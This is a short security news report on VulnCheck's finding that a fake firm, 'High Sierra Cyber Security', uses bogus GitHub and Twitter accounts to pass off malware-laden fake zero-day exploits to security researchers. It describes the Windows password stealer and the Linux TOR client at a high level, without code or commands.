According to cybersecurity firm VulnCheck, hackers are employing deceptive tactics to propagate malware on Windows and Linux systems by employing counterfeit proof-of-concept exploits for zero-day vulnerabilities.
The malicious exploits are being promoted through a fabricated cybersecurity firm named High Sierra Cyber Security, which has established bogus Twitter and GitHub accounts for disseminating their repositories. VulnCheck has observed this campaign persisting since at least May 2023, targeting cybersecurity researchers and firms involved in vulnerability research. The purported exploits aim at well-known software applications such as Chrome, Discord, Signal, WhatsApp, and Microsoft Exchange. The malware is disseminated via a Python script that functions as a downloader for both Linux and Windows operating systems.
The Windows variant of the malware operates as a password-stealing Trojan, while the Linux variant installs a TOR client. The Windows binary has been identified as suspicious by more than 60% of anti-virus engines on VirusTotal. The malware is saved in either the Windows %Temp% directory or the Linux /home//.local/share directory, where it is extracted and executed. VulnCheck notes that the threat actors are persistent, establishing new accounts and repositories whenever the existing ones are taken down. Currently, the hackers are employing seven GitHub repositories, and security researchers and enthusiasts are advised to exercise caution when downloading scripts from unfamiliar repositories.
The bogus cybersecurity firm responsible for this campaign adopts the identities of legitimate security researchers associated with firms like Rapid7 in order to lend credibility to their repositories. These same personas maintain Twitter accounts to attract victims from the social media platform. The repositories themselves appear legitimate, making it challenging to distinguish the counterfeit exploits. The hackers are likely targeting cybersecurity researchers to gain unauthorized access to their systems, which can then be exploited for data theft or to launch additional cyber attacks. While the campaign’s level of success remains uncertain, the threat actors demonstrate persistence by continuously establishing new accounts and repositories.
